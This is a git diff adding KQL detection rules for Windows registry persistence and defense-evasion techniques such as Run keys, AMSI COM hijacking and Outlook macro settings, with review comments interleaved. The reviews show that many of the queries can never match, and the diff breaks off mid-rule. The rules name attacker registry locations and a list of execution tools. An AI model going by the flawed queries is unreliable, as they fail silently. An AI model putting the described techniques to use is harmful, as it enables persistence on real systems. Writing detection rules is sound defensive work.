+| where RegistryValueData =~ "Binary Data" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates*" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\AuthRoot\\Certificates*") and RegistryKey endswith "\\Blob"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
new file mode 100644
index 00000000..5e36cf0c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/new_run_key_pointing_to_suspicious_folder.kql
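Review bot: Each `RegistryKey endswith "...\\Certificates*"` alternative carries a literal `*`, and it is combined with `RegistryKey endswith "\\Blob"` on the same field, so the clause is always false and this rule never fires; `Blob` is the value name. Rewrite the nine key tests as `RegistryKey contains` on their `...\\Root\\Certificates\\`, `...\\CA\\Certificates\\` and `...\\AuthRoot\\Certificates\\` paths and add `RegistryValueName =~ "Blob"`. `RegistryValueData =~ "Binary Data"` is Sysmon's placeholder; in Defender filter on `RegistryValueType =~ "Binary"` instead (confirm the type string on a live event), as the raw blob is not reported as that literal string.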
@@ -0,0 +1,12 @@
+// Title: New RUN Key Pointing to Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2018-08-25
+// Level: high
+// Description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Software using weird folders for updates
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and ((RegistryValueData contains ":\\Perflogs" or RegistryValueData contains ":\\ProgramData'" or RegistryValueData contains ":\\Windows\\Temp" or RegistryValueData contains ":\\Temp" or RegistryValueData contains "\\AppData\\Local\\Temp" or RegistryValueData contains "\\AppData\\Roaming" or RegistryValueData contains ":\\$Recycle.bin" or RegistryValueData contains ":\\Users\\Default" or RegistryValueData contains ":\\Users\\public" or RegistryValueData contains "%temp%" or RegistryValueData contains "%tmp%" or RegistryValueData contains "%Public%" or RegistryValueData contains "%AppData%") or (RegistryValueData contains ":\\Users\\" and (RegistryValueData contains "\\Favorites" or RegistryValueData contains "\\Favourites" or RegistryValueData contains "\\Contacts" or RegistryValueData contains "\\Music" or RegistryValueData contains "\\Pictures" or RegistryValueData contains "\\Documents" or RegistryValueData contains "\\Photos"))) and (not(((RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Windows\\Temp\\") and (RegistryValueData contains "rundll32.exe " and RegistryValueData contains 
"C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32") and InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\Download\\" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce*"))) and (not((RegistryValueData endswith "Spotify.exe --autostart --minimized" and (InitiatingProcessFolderPath endswith "C:\\Program Files\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe") and RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql new file mode 100644 index 00000000..660cb5a5 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/new_timeproviders_registered_with_uncommon_dll_name.kql @@ -0,0 +1,12 @@ +// Title: New TimeProviders Registered With Uncommon DLL Name +// Author: frack113 +// Date: 2022-06-19 +// Level: high +// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. +// Adversaries may abuse time providers to execute DLLs when the system boots. +// The Windows Time service (W32Time) enables time synchronization across and within domains. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1547.003 + +DeviceRegistryEvents +| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL")))) \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
new file mode 100644
index 00000000..fb1a6b4f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/office_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: Office Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Word\\Addins" or RegistryKey contains "\\PowerPoint\\Addins" or RegistryKey contains "\\Outlook\\Addins" or RegistryKey contains "\\Onenote\\Addins" or RegistryKey contains "\\Excel\\Addins" or RegistryKey contains "\\Access\\Addins" or RegistryKey contains "test\\Special\\Perf") and (RegistryKey contains "\\Software\\Wow6432Node\\Microsoft\\Office" or RegistryKey contains "\\Software\\Microsoft\\Office")) and (not((RegistryValueData =~ "(Empty)" or ((InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\msiexec.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\regsvr32.exe") and (RegistryKey endswith "\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1*" or RegistryKey endswith "\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim*" or RegistryKey endswith "\\Excel\\Addins\\NativeShim.InquireConnector.1*" or RegistryKey endswith "\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1*" or RegistryKey endswith "\\Outlook\\AddIns\\AccessAddin.DC*" or RegistryKey endswith 
"\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector*" or RegistryKey endswith "\\Outlook\\AddIns\\EvernoteOLRD.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1*" or RegistryKey endswith "\\Outlook\\Addins\\OcOffice.OcForms*" or RegistryKey contains "\\Outlook\\Addins\\OneNote.OutlookAddin" or RegistryKey endswith "\\Outlook\\Addins\\OscAddin.Connect*" or RegistryKey endswith "\\Outlook\\Addins\\OutlookChangeNotifier.Connect*" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.LyncAddin.1" or RegistryKey contains "\\Outlook\\Addins\\UCAddin.UCAddin.1" or RegistryKey endswith "\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin*" or RegistryKey contains "AddinTakeNotesService\\FriendlyName")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\"))))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe", "C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt*") or ((InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe", "C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe")) and RegistryKey endswith "\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt*")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql new file mode 100644 index 00000000..a1d37a25 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/office_macros_warning_disabled.kql 
@@ -0,0 +1,12 @@
+// Title: Office Macros Warning Disabled
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\VBAWarnings"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
new file mode 100644
index 00000000..79517046
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/old_tls1_0_tls1_1_protocol_version_enabled.kql
@@ -0,0 +1,12 @@
+// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate enabling of the old tls versions due to incompatibility
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled"
\ No newline at end of file
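Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is the Sysmon EventID 13 Details format; DeviceRegistryEvents reports DWORD data as the plain decimal string (Microsoft's own hunting samples compare `RegistryValueData == "1"`), so this high-severity rule will not match the VBAWarnings change it describes. Use `RegistryValueData == "1"` (optionally with `RegistryValueType =~ "Dword"`). `VBAWarnings` is a value name, and if MDE keeps value names in `RegistryValueName` rather than on `RegistryKey` — worth confirming on one real row — the second term must be `RegistryValueName =~ "VBAWarnings" and RegistryKey endswith "\\Security"`.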
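Review bot: `RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*"` ANDed with `RegistryKey endswith "\\Enabled"` is unsatisfiable, since `endswith` has no wildcard support, so the rule never sees the `...\TLS 1.0\Client\Enabled` and `...\Server\Enabled` writes it is meant to watch. Replace the two wildcard terms with `RegistryKey contains "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0\\"` and the TLS 1.1 twin, and compare the value against MDE's decimal form, `RegistryValueData == "1"`, rather than the Sysmon literal `"DWORD (0x00000001)"`.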
diff --git a/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
new file mode 100644
index 00000000..f3d70682
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql
@@ -0,0 +1,10 @@
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
new file mode 100644
index 00000000..67fee9f5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_macro_execution_without_warning_setting_enabled.kql
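Review bot: The value comparison `RegistryValueData =~ "DWORD (0x00000001)"` will not match in DeviceRegistryEvents, where DWORD data arrives as a decimal string rather than the Sysmon Details rendering; for a level-high rule that is a silent miss. Pin it to `RegistryValueData == "1"`, and since `EnableUnsafeClientMailRules` is a value rather than a key, check whether MDE puts it in `RegistryValueName` — if so the key term becomes `RegistryKey endswith "\\Outlook\\Security" and RegistryValueName =~ "EnableUnsafeClientMailRules"`.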
@@ -0,0 +1,12 @@
+// Title: Outlook Macro Execution Without Warning Setting Enabled
+// Author: @ScoubiMtl
+// Date: 2021-04-05
+// Level: high
+// Description: Detects the modification of Outlook security setting to allow unprompted execution of macros.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData contains "0x00000001" and RegistryKey endswith "\\Outlook\\Security\\Level"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
new file mode 100644
index 00000000..842110b0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/outlook_security_settings_updated_registry.kql
@@ -0,0 +1,12 @@
+// Title: Outlook Security Settings Updated - Registry
+// Author: frack113
+// Date: 2021-12-28
+// Level: medium
+// Description: Detects changes to the registry values related to outlook security settings
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Administrative activity
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
new file mode 100644
index 00000000..626c2a50
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/periodic_backup_for_system_registry_hives_enabled.kql
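Review bot: `RegistryValueData contains "0x00000001"` only matches Sysmon's hex rendering of the Details field; MDE reports a DWORD write as its decimal value, so `Level` set to 1 shows up as `"1"` and this rule never fires. Suggest `RegistryValueData == "1"`, which is also stricter than `contains` (the current form would have matched `0x00000010` and `0x00000011` too).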
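Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Security*"` cannot both hold — a key has a single suffix, and no real key ends in a literal `*` — so this rule returns nothing. The Sigma source is a pair of substring matches, which in KQL is `RegistryKey contains "\\SOFTWARE\\Microsoft\\Office\\" and RegistryKey contains "\\Outlook\\Security"`.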
@@ -0,0 +1,13 @@
+// Title: Periodic Backup For System Registry Hives Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-01
+// Level: medium
+// Description: Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, The OS will backup System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
+// Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113
+// False Positives:
+// - Legitimate need for RegBack feature by administrators.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Control\\Session Manager\\Configuration Manager\\EnablePeriodicBackup"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
new file mode 100644
index 00000000..ea9b0f14
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_disk_cleanup_handler_autorun.kql
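Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is Sysmon's Details formatting and will not match a DeviceRegistryEvents row, where DWORD data is the decimal string `"1"`; as written the rule never fires. Change to `RegistryValueData == "1"` and, if the type constraint is wanted, add `RegistryValueType =~ "Dword"`. `EnablePeriodicBackup` is a value under `Configuration Manager`, so if MDE reports value names in `RegistryValueName` the key term should end at `"\\Control\\Session Manager\\Configuration Manager"` with `RegistryValueName =~ "EnablePeriodicBackup"` alongside.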
@@ -0,0 +1,15 @@
+// Title: Persistence Via Disk Cleanup Handler - Autorun
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
+// The disk cleanup manager is part of the operating system.
+// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString")))
\ No newline at end of file
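Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*"` is a literal suffix match in KQL and requires the key to end in `*`, so neither the `\Autorun` branch nor the `CleanupString`/`PreCleanupString` branch can ever be reached. It should be `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\"`. The `Autorun` branch additionally compares against `"DWORD (0x00000001)"`, which is the Sysmon rendering; MDE supplies `"1"`. `Autorun`, `CleanupString` and `PreCleanupString` are value names, so those `RegistryKey contains` terms probably need to move to `RegistryValueName` — confirm on a sample row.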
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
new file mode 100644
index 00000000..5aadd689
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_hhctrl_ocx.kql
@@ -0,0 +1,12 @@
+// Title: Persistence Via Hhctrl.ocx
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
new file mode 100644
index 00000000..9d4e9561
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/persistence_via_new_sip_provider.kql
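Review bot: The `\\(Default)` suffix in `RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)"` is how Sysmon labels a write to a key's default value; DeviceRegistryEvents does not append it (the default value appears to surface as an empty `RegistryValueName` instead), so this high-severity rule will never match a hijacked hhctrl handler. Suggested form: `RegistryKey endswith "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32" and isempty(RegistryValueName) and not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")`. Consider also allowing the `%SystemRoot%\System32\hhctrl.ocx` spelling so a legitimate repair of the key does not alert.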
@@ -0,0 +1,12 @@
+// Title: Persistence Via New SIP Provider
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003
+// False Positives:
+// - Legitimate SIP being registered by the OS or different software.
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
new file mode 100644
index 00000000..b848e165
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_amsi_com_server_hijacking.kql
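Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*"` (and its WOW6432Node twin) can only match a key literally ending in `*`, so of the four path alternatives only the two `OID\\EncodingType` `contains` terms are live, and new registrations under `Providers\Trust\...` — the main T1553.003 case — are missed. Emit `RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\"` instead, and likewise for WOW6432Node. The `\\Dll` / `\\$DLL` terms name values (`Dll`, `$DLL`, `FuncName`), so if MDE reports value names in `RegistryValueName` they should be checked there rather than on the key path.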
@@ -0,0 +1,10 @@
+// Title: Potential AMSI COM Server Hijacking
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: high
+// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
new file mode 100644
index 00000000..e9eb483b
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_associations_tamper.kql
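Review bot: `RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)"` carries Sysmon's `\(Default)` suffix; DeviceRegistryEvents reports a default-value write with an empty `RegistryValueName` and no such suffix on the key, so this rule cannot match the AMSI COM hijack it documents. Suggest `RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32" and isempty(RegistryValueName)` in front of the existing `not(RegistryValueData =~ "%windir%\\system32\\amsi.dll")`. The allow-list should probably also accept the expanded `C:\Windows\system32\amsi.dll` spelling, which is how a legitimate repair of the key may be written.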
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Associations Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
new file mode 100644
index 00000000..97a36539
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_attachment_manager_settings_attachments_tamper.kql
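Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations*"` is ANDed with `endswith "\\DefaultFileTypeRisk"` / `endswith "\\LowRiskFileTypes"`; because `endswith` takes the `*` literally the conjunction is unsatisfiable and this high-severity rule is inert. Replace it with `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations"`. The `"DWORD (0x00006152)"` comparison is Sysmon-format as well; in MDE the value 0x6152 arrives as the decimal string `"24914"`. `DefaultFileTypeRisk` and `LowRiskFileTypes` are value names, so check whether they belong in `RegistryValueName` on this table.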
@@ -0,0 +1,12 @@
+// Title: Potential Attachment Manager Settings Attachments Tamper
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
new file mode 100644
index 00000000..2a25463c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_autologger_sessions_tampering.kql
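Review bot: `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments*"` never matches a real key (KQL `endswith` has no wildcard), so the three value checks for `HideZoneInfoOnProperties`, `SaveZoneInformation` and `ScanWithAntiVirus` are unreachable and the rule is dead. Use `RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments"`, and compare `RegistryValueData` to `"1"` / `"2"` rather than the Sysmon-style `DWORD (0x0000000N)` strings, which DeviceRegistryEvents does not produce.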
@@ -0,0 +1,10 @@
+// Title: Potential AutoLogger Sessions Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-01
+// Level: high
+// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
